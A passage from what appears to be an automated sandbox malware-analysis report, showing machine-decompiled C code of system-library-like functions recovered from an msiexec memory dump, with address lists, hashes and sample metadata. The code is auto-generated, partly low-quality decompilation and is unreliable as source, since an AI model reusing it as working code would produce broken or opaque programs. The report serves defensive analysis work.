								_push( *_t137 & 0x000000ff);
								E04D49AE0();
								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04D22400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04D22400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04D22400( &_v52);
							}
							if(_v28 >= 0) {
								return L04D22400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                              0x04d86dd4
                              0x04d86dde
                              0x04d86de1
                              0x04d86de3
                              0x04d86de6
                              0x04d86de9
                              0x04d86dec
                              0x04d86def
                              0x04d86df2
                              0x04d86df5
                              0x04d86dfe
                              0x04d86e04
                              0x04d86e09
                              0x04d86e0d
                              0x04d86e18
                              0x04d86e1b
                              0x04d86e22
                              0x04d86e2d
                              0x04d86e30
                              0x04d86e36
                              0x04d86e42
                              0x04d86e4d
                              0x04d86e50
                              0x04d86e55
                              0x04d86e5c
                              0x04d86e6e
                              0x04d86e5e
                              0x04d86e67
                              0x04d86e67
                              0x04d86e73
                              0x04d86e74
                              0x04d86e77
                              0x04d86e7c
                              0x04d86e7d
                              0x04d86e8e
                              0x04d86e93
                              0x04d86e9c
                              0x04d86ea8
                              0x04d86eab
                              0x04d86eac
                              0x04d86eb3
                              0x04d86ecd
                              0x04d86edc
                              0x04d86ee2
                              0x04d86ee5
                              0x04d86ef2
                              0x04d86efb
                              0x04d86f01
                              0x04d86f06
                              0x04d86f0b
                              0x04d86f11
                              0x04d86f1a
                              0x04d86f22
                              0x04d86f26
                              0x04d86f26
                              0x04d86f33
                              0x04d86f41
                              0x04d86f44
                              0x04d86f47
                              0x04d86f54
                              0x04d86f65
                              0x04d86f77
                              0x04d86f7c
                              0x04d86f82
                              0x04d86f91
                              0x04d86f99
                              0x04d86fa3
                              0x04d86fae
                              0x04d86fae
                              0x04d86fba
                              0x04d86fbb
                              0x04d86fbc
                              0x04d86fc1
                              0x04d86fc2
                              0x04d86fd3
                              0x04d86fd8
                              0x04d86fd8
                              0x04d86fdf
                              0x04d86fe8
                              0x04d86fee
                              0x04d86fee
                              0x04d86ff5
                              0x04d86ffb
                              0x04d86ffb
                              0x04d87004
                              0x00000000
                              0x04d8700a
                              0x04d87004
                              0x04d86eb3
                              0x04d86e9c
                              0x04d87015

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                              • Instruction ID: 3b94f826e65a4a97191b28bd482381930bd83c80667189a00acd0e6002a715f5
                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                              • Instruction Fuzzy Hash: B8715D71A00619EFDB11EFA5C984EEEBBB9FF48718F104069E505A7250DB34FA41CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D9B8D0 Relevance: .2, Instructions: 199COMMON
                              Download Yara Rule
                              C-Code - Quality: 39%
                              			E04D9B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4df7b9c; // 0x0
				_t124 = L04D24620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04D49800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04D495B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04D495D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04D277F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04D49910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04D495D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4df7b9c; // 0x0
									_t92 = L04D24620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04D49910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04D0A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04D9E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04D9E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04D495B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                              0x04d9b8d9
                              0x04d9b8e4
                              0x00000000
                              0x04d9b8e6
                              0x04d9b8f3
                              0x04d9b8f5
                              0x04d9b8f5
                              0x04d9b8f8
                              0x04d9b920
                              0x04d9b924
                              0x04d9b936
                              0x04d9b939
                              0x04d9b93d
                              0x04d9b948
                              0x04d9b9a0
                              0x04d9b9a0
                              0x04d9b9a4
                              0x04d9b9bf
                              0x04d9b9c4
                              0x04d9b9c6
                              0x04d9b9cd
                              0x04d9b9d1
                              0x04d9bad4
                              0x04d9bad8
                              0x04d9bada
                              0x04d9badc
                              0x04d9badc
                              0x04d9badf
                              0x04d9bae0
                              0x04d9bae2
                              0x04d9bae4
                              0x04d9baec
                              0x04d9baee
                              0x04d9baf0
                              0x04d9baf0
                              0x04d9baec
                              0x04d9bafb
                              0x04d9bafc
                              0x04d9bafe
                              0x04d9bb01
                              0x04d9bb01
                              0x00000000
                              0x04d9bb06
                              0x04d9b9d7
                              0x04d9b9db
                              0x04d9b9db
                              0x04d9b9de
                              0x04d9b9de
                              0x04d9b9e4
                              0x04d9b9e7
                              0x04d9b9ea
                              0x04d9b9ec
                              0x04d9b9ef
                              0x04d9b9f3
                              0x04d9ba1b
                              0x04d9ba1b
                              0x04d9ba23
                              0x04d9ba24
                              0x04d9ba27
                              0x04d9ba2a
                              0x04d9ba2b
                              0x04d9ba2e
                              0x04d9ba30
                              0x04d9ba37
                              0x04d9ba3f
                              0x04d9ba9c
                              0x04d9baa2
                              0x04d9bb13
                              0x04d9bb15
                              0x04d9baae
                              0x04d9baae
                              0x04d9bab3
                              0x04d9bab5
                              0x04d9baba
                              0x04d9bac8
                              0x04d9bac8
                              0x04d9baba
                              0x04d9bacd
                              0x04d9bacf
                              0x00000000
                              0x04d9bacf
                              0x04d9bb1a
                              0x00000000
                              0x04d9bb1c
                              0x04d9baa7
                              0x04d9bb11
                              0x00000000
                              0x04d9bb11
                              0x04d9baa9
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d9ba41
                              0x04d9ba41
                              0x04d9ba41
                              0x04d9ba58
                              0x04d9ba5d
                              0x04d9ba62
                              0x00000000
                              0x00000000
                              0x04d9ba64
                              0x04d9ba67
                              0x04d9ba68
                              0x04d9ba69
                              0x04d9ba6c
                              0x04d9ba6f
                              0x04d9ba71
                              0x04d9ba78
                              0x04d9ba80
                              0x00000000
                              0x00000000
                              0x04d9ba90
                              0x04d9ba90
                              0x04d9ba97
                              0x00000000
                              0x04d9ba97
                              0x04d9b9f5
                              0x04d9b9f7
                              0x04d9b9f7
                              0x04d9b9fa
                              0x04d9ba03
                              0x04d9ba07
                              0x04d9ba0c
                              0x04d9ba10
                              0x04d9ba17
                              0x00000000
                              0x04d9b9f7
                              0x04d9b9a6
                              0x04d9b9a8
                              0x04d9b9af
                              0x04d9b9b3
                              0x00000000
                              0x00000000
                              0x04d9b9b9
                              0x00000000
                              0x04d9b9b9
                              0x04d9b94d
                              0x04d9b98f
                              0x04d9b995
                              0x04d9b999
                              0x04d9b960
                              0x04d9b967
                              0x04d9b968
                              0x04d9b96a
                              0x00000000
                              0x04d9b96a
                              0x04d9b99b
                              0x04d9b99e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d9b99e
                              0x04d9b951
                              0x04d9b954
                              0x04d9b95a
                              0x04d9b95e
                              0x04d9b972
                              0x04d9b979
                              0x04d9b97d
                              0x04d9b97f
                              0x04d9b980
                              0x04d9b982
                              0x04d9b984
                              0x00000000
                              0x04d9b984
                              0x00000000
                              0x04d9b926
                              0x00000000
                              0x04d9b926

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ddd3b3a63b9672e587b4a3dd571ded0411f3dab37c10e7b00939aa9b3b9c6de7
                              • Instruction ID: b88132140acb845c572ff46b52eda302836ce5f197a4e33bd2199d163ee0651f
                              • Opcode Fuzzy Hash: ddd3b3a63b9672e587b4a3dd571ded0411f3dab37c10e7b00939aa9b3b9c6de7
                              • Instruction Fuzzy Hash: 4D71DD32200701AFEB31CF25D844B66BBE5FB84728F12452AE655CB2A0DBB4FD40CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D052A5 Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              C-Code - Quality: 78%
                              			E04D052A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04D1EEF0(0x4df79a0);
					_t104 =  *0x4df8210; // 0x3052cb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E04D1EB70(_t93, 0x4df79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04D49890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04D1EEF0(0x4df79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04D1EB70(0, 0x4df79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x3052cbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04D3F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04D1EEF0(0x4df79a0);
									__eflags =  *0x4df8210 - _t104; // 0x3052cb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4df8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04D84888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E04D1EB70(_t95, 0x4df79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04D495D0();
											L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04D495D0();
											L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04D1EB70(_t93, 0x4df79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E04D495D0();
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04D495D0();
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04D3F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                              0x04d052a5
                              0x04d052ad
                              0x04d052b0
                              0x04d052b3
                              0x04d052b7
                              0x04d052ba
                              0x04d052bf
                              0x04d052c4
                              0x04d052cc
                              0x00000000
                              0x00000000
                              0x04d052ce
                              0x04d052d9
                              0x04d052dd
                              0x04d052e7
                              0x04d052f7
                              0x04d052f9
                              0x04d052fd
                              0x04d60dcf
                              0x04d60dd5
                              0x04d60dd6
                              0x04d60dd7
                              0x04d60dd8
                              0x04d60dd9
                              0x04d60dde
                              0x04d60ddf
                              0x04d60de0
                              0x04d60de1
                              0x04d60de2
                              0x04d60de5
                              0x04d60dea
                              0x04d60dec
                              0x04d60f60
                              0x04d60f64
                              0x04d60f70
                              0x04d60f76
                              0x04d60f79
                              0x04d60f79
                              0x00000000
                              0x04d60f64
                              0x04d60df2
                              0x04d60df7
                              0x04d60e04
                              0x04d60e0d
                              0x04d60e0d
                              0x04d60e10
                              0x04d60e1a
                              0x04d60e1c
                              0x04d60e4c
                              0x04d60e52
                              0x04d60e61
                              0x04d60e67
                              0x04d60e6b
                              0x04d60e70
                              0x04d60e76
                              0x04d60ed7
                              0x04d60edc
                              0x04d60ee0
                              0x04d60ee6
                              0x04d60eea
                              0x04d60eed
                              0x04d60ef0
                              0x04d60ef3
                              0x04d60ef6
                              0x04d60ef9
                              0x04d60efe
                              0x04d60f01
                              0x04d60f01
                              0x04d60f0b
                              0x04d60f12
                              0x04d60f16
                              0x04d60f18
                              0x04d60f1b
                              0x04d60f2c
                              0x04d60f31
                              0x04d60f31
                              0x04d60f35
                              0x04d60f39
                              0x04d60f3a
                              0x04d60f3c
                              0x04d60f3f
                              0x04d60f50
                              0x04d60f55
                              0x04d60f55
                              0x04d60f59
                              0x04d052eb
                              0x04d052f1
                              0x04d052f1
                              0x04d60e7d
                              0x04d60e84
                              0x04d60e88
                              0x04d60e8a
                              0x04d60e8d
                              0x04d60e9e
                              0x04d60ea3
                              0x04d60ea3
                              0x04d60ea7
                              0x04d60eaf
                              0x04d60eb3
                              0x04d60eb9
                              0x04d60eb9
                              0x04d60ebc
                              0x04d60ecd
                              0x04d60ecd
                              0x00000000
                              0x04d60eb3
                              0x04d60e21
                              0x04d60e2b
                              0x04d60e2f
                              0x04d60e30
                              0x04d60e3a
                              0x04d60e3f
                              0x04d60e41
                              0x00000000
                              0x00000000
                              0x04d60e47
                              0x00000000
                              0x04d60e47
                              0x04d60df9
                              0x04d60dfe
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d60dfe
                              0x04d05303
                              0x04d05307
                              0x00000000
                              0x04d05309
                              0x00000000
                              0x04d05309
                              0x04d05307
                              0x04d052e9
                              0x04d052e9
                              0x00000000
                              0x04d052e9
                              0x04d0530e
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 117b2315285220007bb2478d7e349b48082f2add1187363937cfc6e2155d7514
                              • Instruction ID: 6fd58c1c05a2eea9a38f24d90e0f91a775e2f8c7af13a7781e98fa0c93fc18c5
                              • Opcode Fuzzy Hash: 117b2315285220007bb2478d7e349b48082f2add1187363937cfc6e2155d7514
                              • Instruction Fuzzy Hash: 2351DF71205742AFE721EF68D940B27BBE4FF50718F14891EE89687691E770F844CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D32AE4 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D32AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4df8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4df8208; // 0x4df8207
				_t8 = _t57 + 0x4df8208; // 0x4df8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4df8450; // 0x3051794
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4df821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4df6d5c; // 0x7fc80654
							_t72 =  *0x4df6d5c; // 0x7fc80654
							_t75 =  *0x4df6d5c; // 0x7fc80654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4df6d5c; // 0x7fc80654
							_t84 =  *0x4df6d5c; // 0x7fc80654
							_t87 =  *0x4df6d5c; // 0x7fc80654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04D4F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                              0x04d32ae4
                              0x04d32aec
                              0x04d32aef
                              0x04d32af4
                              0x04d32af7
                              0x04d32afd
                              0x04d32b92
                              0x04d32b92
                              0x04d32b97
                              0x04d32b9c
                              0x04d32b9c
                              0x04d32b03
                              0x04d32b06
                              0x04d32b09
                              0x04d32b09
                              0x04d32b0f
                              0x04d32b15
                              0x04d32b15
                              0x04d32b1b
                              0x04d32b1e
                              0x04d32b21
                              0x04d32b26
                              0x04d32b29
                              0x04d32b81
                              0x04d32b84
                              0x04d32c0e
                              0x04d32c15
                              0x04d32c24
                              0x04d32c24
                              0x04d32b8a
                              0x04d32b8a
                              0x04d32b8a
                              0x04d32b8a
                              0x04d32b90
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d32b4a
                              0x04d32b4a
                              0x04d32b4d
                              0x04d32b53
                              0x00000000
                              0x00000000
                              0x04d32b55
                              0x04d32b58
                              0x04d32bb7
                              0x04d75d1b
                              0x04d75d37
                              0x04d75d47
                              0x04d75d53
                              0x04d32bbd
                              0x04d32bbd
                              0x04d32bbd
                              0x04d32bb7
                              0x04d32b5d
                              0x04d32c2f
                              0x04d75d5b
                              0x04d75d77
                              0x04d75d87
                              0x04d75d93
                              0x04d32c35
                              0x04d32c35
                              0x04d32c35
                              0x04d32c2f
                              0x04d32b65
                              0x04d32b9f
                              0x04d32ba2
                              0x04d32b67
                              0x04d32b67
                              0x04d32b69
                              0x04d32b6b
                              0x04d32b6e
                              0x04d32bc9
                              0x04d32bcc
                              0x04d32bcf
                              0x04d32bd4
                              0x04d32bd6
                              0x04d32bd6
                              0x04d32bdb
                              0x04d32c02
                              0x04d32c05
                              0x04d32c07
                              0x00000000
                              0x04d32c07
                              0x04d32be0
                              0x04d32c00
                              0x04d32c3f
                              0x04d32c3f
                              0x00000000
                              0x04d32c00
                              0x04d32be5
                              0x04d32be7
                              0x04d32bec
                              0x04d32bf4
                              0x04d32bf6
                              0x00000000
                              0x04d32bf6
                              0x04d32b70
                              0x04d32b76
                              0x04d32b2b
                              0x04d32b2b
                              0x04d32b2d
                              0x04d32b2f
                              0x04d32b32
                              0x04d32b35
                              0x04d32b3a
                              0x00000000
                              0x04d32b40
                              0x04d32b43
                              0x04d32b45
                              0x04d32b47
                              0x04d32b4a
                              0x04d32b4d
                              0x04d32b53
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d32b53
                              0x04d32b78
                              0x04d32b78
                              0x04d32b7b
                              0x04d32b7e
                              0x00000000
                              0x04d32b7e
                              0x04d32b76
                              0x04d32ba5
                              0x04d32ba5
                              0x04d32ba8
                              0x04d32bad
                              0x00000000
                              0x00000000
                              0x04d32baf
                              0x04d32baf
                              0x04d32bc2
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
